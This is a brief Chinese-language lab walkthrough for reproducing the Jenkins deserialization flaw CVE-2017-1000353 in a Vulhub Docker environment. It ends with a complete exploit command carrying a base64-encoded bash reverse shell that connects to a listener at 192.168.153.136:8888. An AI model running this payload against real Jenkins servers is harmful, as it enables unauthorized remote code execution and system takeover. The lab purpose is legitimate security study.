Jenkins
复现Vulhub/jenkins / CVE-2017-1000353的漏洞。
- 覆盖知识点
Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。 Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限
该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中,Jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。 - 实验步骤
1)启动实验环境:
访问页面:
2)利用工具生成字节码文件;
3)通过工具exploit.py发送数据包执行命令;
进入容器docker exec -it cve-2017-1000353_jenkins_1 bash
4)反弹shell
java --add-opens java.base/java.util=ALL-UNNAMED -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguMTUzLjEzNi84ODg4IDA+JjEgMj4mMQ==}|{base64,-d}|{bash,-i}"
发送poc:
监听端口8888,执行命令,反弹shell成功;